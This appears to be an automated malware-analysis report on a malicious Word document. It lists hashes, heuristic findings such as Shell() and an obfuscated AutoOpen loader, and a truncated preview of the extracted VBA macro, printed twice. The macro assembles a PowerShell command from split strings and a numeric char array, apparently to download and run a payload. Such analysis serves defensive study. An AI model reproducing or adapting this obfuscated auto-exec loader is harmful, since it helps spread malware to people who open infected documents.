Office (OLE) malware analysis — malicious · 41b3c9be978c76be

MALICIOUS

Office (OLE)

109.0 KB Created: 2018-07-06 10:56:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: 30e51ad9a071af70adfb0698b1b8071a SHA-1: 2dd24d033f716a894173474a31d5ada6fa1d04fc SHA-256: 41b3c9be978c76be013aed703e50a1cc1f9016bb7a0595efdb0273644dac49d6

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains obfuscated VBA macros with AutoOpen execution, indicative of a downloader. Critical heuristics like 'OLE_VBA_SHELL' and 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' confirm the presence of code designed to execute external commands. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload.

Heuristics 8

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13087 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13087 bytes
SHA-256: `4eb2e6ed983f2c4b0397b62293c1ebc780885a1409dc9b3b71a65ff2915d3292`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "rwUQiDuKfGQlWi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next VuRlj = ouZAA * iLwzfN / (EvkCL / AWVXjK * 84837 - ZjVlF / 64118 / ZptGGD - (15416 - QnLZq + GlrGBi - SXqqIl)) nmTEBz = filMRJ * hZDkX / (uZCzz / vGQOAW * 58280 - SfDIS / 72848 / mlHazu - (96070 - FPDqQv + jTGGB - PPkqnC)) saTkwL = KbjtV * DchGRB / (KaLazj / JAwQE * 13663 - MovmM / 98851 / RuhpkS - (95325 - SXNUj + RPsmOE - KiSoO)) iiiJj = 88442 - kKrKQw / wOLvfK * PuHzf + (ijNYfT + RBoXqd * 20402 - VPDZq) * LXjnvI / SjaKBw - EzSfzX / vanEC LajYiG = 81700 - FjsRFk / kBiTz * fDwBHR + (PwSCc + bltSDz * 90597 - BVpUNn) * FHHmi / fWhXX - njGNqo / Imrib iGKWXYfrAVADY (cwoPBjFNH + HzscnJZn + vMJSnMuE) HHVlWw = 67326 - TTIjIU / MYpqk * WwmUU + (TVHSTf + fJZSYC * 74824 - cYzKCj) * PfKwL / kJjQC - PFLAo / JpKmF LNJEzj = 98885 - adVGAK / kfkiC * ZzNAC + (dYilPL + GlIcks * 11999 - SpsPfj) * zLSGcj / QvDvBV - vrFuL / bcDAm IOcpc = 77485 - jSTUSk / Wpmqd * kbjDjz + (SWwndL + MTDIt * 33671 - bWiWk) * VpBqm / zShiY - dsTNV / rGhrDl iEZpPS = 15863 - kkKjzR / NoiKw * wXcTK + (zsisH + ZFWkMi * 63447 - QhvmqV) * NaPYpF / ijzWF - LoBrC / ZLqdcv End Sub Attribute VB_Name = "zTtZoKRtMGcHX" Function cwoPBjFNH() On Error Resume Next KEkCnD = 24628 * TwoLj - (4913 + bdWHW / (EUUoOD - 11358 - 55692 - AElSsz)) FSRnk = 16953 * sZQkf - (6847 + QwCCB / (kzwijQ - 78294 - 56865 - VKHDCM)) quHRZ = 49090 * iQuFLa - (57350 + TKSzzz / (tUjcdE - 98047 - 602 - chFTc)) uUZaswiM = "wershe" + "ll " + " " + " " + " . " + Chr(40) + " $E" + "nv:coMsPE" + "c[4,24,2" + "5]-JoIN" + "''" + Chr(41) + " " + Chr(40) + " " + Chr(34) + "$" + Chr(40) + "SV " FOutqb = 69999 * sYFJWB - (34081 + HQdCi / (clbSNG - 11068 - 14638 - dEiSj)) hvjulk = 40392 * LFaLJ - (3778 + tNOmJ / (XOdsk - 8268 - 53870 - rilch)) ATWUkM = 94058 * UzcYl - (25842 + WXvcU / (XQsdI - 51267 - 41085 - HsWRSj)) ujKPTA = 34898 * StjajF - (17784 + GkQOZz / (qrwja - 32807 - 19623 - KsZMm)) hiDOPqaRtfi = " 'oFs' '" + "' " + Chr(41) + " " + Chr(34) + " " + Chr(43) + "[ST" + "Ring" + "]" + Chr(40) + Chr(40) + "13 , 1" + "02,9" + "3,66 " + ",20 , 7" + "1 ,76 ," + "94,4, " EDOto = 21228 * sziCvX - (7484 + EiVrcW / (nPnGH - 72807 - 68818 - YSibPi)) jiSHwl = 61221 * rtZOE - (25835 + TPrLB / (mkhZjl - 59423 - 89689 - bzYVhY)) jztsq = 61200 * Cajuq - (32639 + OQCvP / (FhDHII - 12109 - 69377 - voPOR)) sCQHww = 73720 * EuaiqE - (48139 + BTiEL / (KnkpK - 43098 - 96787 - nouzfG)) kFrQQ = 13964 * ftwRX - (20431 + EuYIK / (CBAjsF - 38297 - 43802 - jbTYXc)) EULbobI = "70, 75," + "67 ,76,74" + ", 93,9" + ",103, 76 " + ",93, 7,12" + "6 ,76 , " IRsEj = 23482 * ALvVzh - (1880 + zQTYp / (HJlukZ - 62271 - 9657 - JGGYjD)) VwhDh = 15607 * iFuoY - (70321 + sZpVAA / (zJCwY - 43260 - 59110 - jOjfaY)) UBiPO = 67412 * fDWUAW - (10204 + zztkiM / (AdNRZp - 67849 - 61076 - qHprA)) PIonLGY = "75 ,1" + "06 ," + "69 ,64 " + ",76 , 71" + " ,93,1" + "8 ,13 ," + " 113 " + ",77," + " 79,20" YtKaqi = 14692 * GqXqjf - (80489 + WEpzYW / (OcjvuY - 16719 - 313 - drwET)) IiIwUC = 3667 * bWEXa - (71379 + XCJvw / (nMJzp - 4264 - 24729 - jlNrbh)) hkNZt = 77637 * cCGJC - (59226 + AnVziG / (rmpCK - 48832 - 85978 - GMltia)) kdBlc = 2308 * LfskPH - (99632 + WBHHJw / (zvSlOr - 17175 - 40275 - rTAnL)) iXjrzQUNnvM = " ,14 ," + " 65,93" + ",93, 89 ," + "19,6" + ",6,94 , " + "94 , 94 ," + "7,90, 93 " + ",72,91,2" + "4 , 17, " + "78 , 92," + " 72, 9" + "1 , 77 ,6" lOhhF = 6229 * CVprFq - (97960 + WnzqB / (GomJI - 43206 - 83431 - DjKXHq)) SopMQS = 15198 * pqoKI - (23654 + RckMl / (cndFbf - 97606 - 24189 - zpHbC)) PMaRUY = 38802 * ZjEUuu - (46659 + TVSwwi / (paskr - 61396 - 97039 - GHbuj)) oiTkq = "4, 7" + "2 , 71," + "90 , 7," + "74 ,70 " + ",68,6, 76" + " ,109 ,28" + " ,109 ," + " 104,68 ," lWDwP = 73148 * ChjEw - ... (truncated)

SHA-256: 4eb2e6ed983f2c4b0397b62293c1ebc780885a1409dc9b3b71a65ff2915d3292

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "rwUQiDuKfGQlWi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   VuRlj = ouZAA * iLwzfN / (EvkCL / AWVXjK * 84837 - ZjVlF / 64118 / ZptGGD - (15416 - QnLZq + GlrGBi - SXqqIl))
   nmTEBz = filMRJ * hZDkX / (uZCzz / vGQOAW * 58280 - SfDIS / 72848 / mlHazu - (96070 - FPDqQv + jTGGB - PPkqnC))
   saTkwL = KbjtV * DchGRB / (KaLazj / JAwQE * 13663 - MovmM / 98851 / RuhpkS - (95325 - SXNUj + RPsmOE - KiSoO))
   iiiJj = 88442 - kKrKQw / wOLvfK * PuHzf + (ijNYfT + RBoXqd * 20402 - VPDZq) * LXjnvI / SjaKBw - EzSfzX / vanEC
   LajYiG = 81700 - FjsRFk / kBiTz * fDwBHR + (PwSCc + bltSDz * 90597 - BVpUNn) * FHHmi / fWhXX - njGNqo / Imrib
iGKWXYfrAVADY (cwoPBjFNH + HzscnJZn + vMJSnMuE)
   HHVlWw = 67326 - TTIjIU / MYpqk * WwmUU + (TVHSTf + fJZSYC * 74824 - cYzKCj) * PfKwL / kJjQC - PFLAo / JpKmF
   LNJEzj = 98885 - adVGAK / kfkiC * ZzNAC + (dYilPL + GlIcks * 11999 - SpsPfj) * zLSGcj / QvDvBV - vrFuL / bcDAm
   IOcpc = 77485 - jSTUSk / Wpmqd * kbjDjz + (SWwndL + MTDIt * 33671 - bWiWk) * VpBqm / zShiY - dsTNV / rGhrDl
   iEZpPS = 15863 - kkKjzR / NoiKw * wXcTK + (zsisH + ZFWkMi * 63447 - QhvmqV) * NaPYpF / ijzWF - LoBrC / ZLqdcv
End Sub


Attribute VB_Name = "zTtZoKRtMGcHX"
Function cwoPBjFNH()
On Error Resume Next
KEkCnD = 24628 * TwoLj - (4913 + bdWHW / (EUUoOD - 11358 - 55692 - AElSsz))
   FSRnk = 16953 * sZQkf - (6847 + QwCCB / (kzwijQ - 78294 - 56865 - VKHDCM))
   quHRZ = 49090 * iQuFLa - (57350 + TKSzzz / (tUjcdE - 98047 - 602 - chFTc))
uUZaswiM = "wershe" + "ll    " + "        " + "      " + " . " + Chr(40) + " $E" + "nv:coMsPE" + "c[4,24,2" + "5]-JoIN" + "''" + Chr(41) + " " + Chr(40) + " " + Chr(34) + "$" + Chr(40) + "SV "
FOutqb = 69999 * sYFJWB - (34081 + HQdCi / (clbSNG - 11068 - 14638 - dEiSj))
   hvjulk = 40392 * LFaLJ - (3778 + tNOmJ / (XOdsk - 8268 - 53870 - rilch))
   ATWUkM = 94058 * UzcYl - (25842 + WXvcU / (XQsdI - 51267 - 41085 - HsWRSj))
   ujKPTA = 34898 * StjajF - (17784 + GkQOZz / (qrwja - 32807 - 19623 - KsZMm))
hiDOPqaRtfi = " 'oFs' '" + "' " + Chr(41) + " " + Chr(34) + " " + Chr(43) + "[ST" + "Ring" + "]" + Chr(40) + Chr(40) + "13 , 1" + "02,9" + "3,66 " + ",20 , 7" + "1 ,76 ," + "94,4, "
EDOto = 21228 * sziCvX - (7484 + EiVrcW / (nPnGH - 72807 - 68818 - YSibPi))
   jiSHwl = 61221 * rtZOE - (25835 + TPrLB / (mkhZjl - 59423 - 89689 - bzYVhY))
   jztsq = 61200 * Cajuq - (32639 + OQCvP / (FhDHII - 12109 - 69377 - voPOR))
   sCQHww = 73720 * EuaiqE - (48139 + BTiEL / (KnkpK - 43098 - 96787 - nouzfG))
   kFrQQ = 13964 * ftwRX - (20431 + EuYIK / (CBAjsF - 38297 - 43802 - jbTYXc))
EULbobI = "70, 75," + "67 ,76,74" + ", 93,9" + ",103, 76 " + ",93, 7,12" + "6 ,76 , "
IRsEj = 23482 * ALvVzh - (1880 + zQTYp / (HJlukZ - 62271 - 9657 - JGGYjD))
   VwhDh = 15607 * iFuoY - (70321 + sZpVAA / (zJCwY - 43260 - 59110 - jOjfaY))
   UBiPO = 67412 * fDWUAW - (10204 + zztkiM / (AdNRZp - 67849 - 61076 - qHprA))
PIonLGY = "75 ,1" + "06 ," + "69 ,64 " + ",76 , 71" + " ,93,1" + "8 ,13 ," + " 113 " + ",77," + " 79,20"
YtKaqi = 14692 * GqXqjf - (80489 + WEpzYW / (OcjvuY - 16719 - 313 - drwET))
   IiIwUC = 3667 * bWEXa - (71379 + XCJvw / (nMJzp - 4264 - 24729 - jlNrbh))
   hkNZt = 77637 * cCGJC - (59226 + AnVziG / (rmpCK - 48832 - 85978 - GMltia))
   kdBlc = 2308 * LfskPH - (99632 + WBHHJw / (zvSlOr - 17175 - 40275 - rTAnL))
iXjrzQUNnvM = " ,14 ," + " 65,93" + ",93, 89 ," + "19,6" + ",6,94 , " + "94 , 94 ," + "7,90, 93 " + ",72,91,2" + "4 , 17, " + "78 , 92," + " 72, 9" + "1 , 77 ,6"
lOhhF = 6229 * CVprFq - (97960 + WnzqB / (GomJI - 43206 - 83431 - DjKXHq))
   SopMQS = 15198 * pqoKI - (23654 + RckMl / (cndFbf - 97606 - 24189 - zpHbC))
   PMaRUY = 38802 * ZjEUuu - (46659 + TVSwwi / (paskr - 61396 - 97039 - GHbuj))
oiTkq = "4, 7" + "2 , 71," + "90 , 7," + "74 ,70 " + ",68,6, 76" + " ,109 ,28" + " ,109 ," + " 104,68 ,"
lWDwP = 73148 * ChjEw -
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.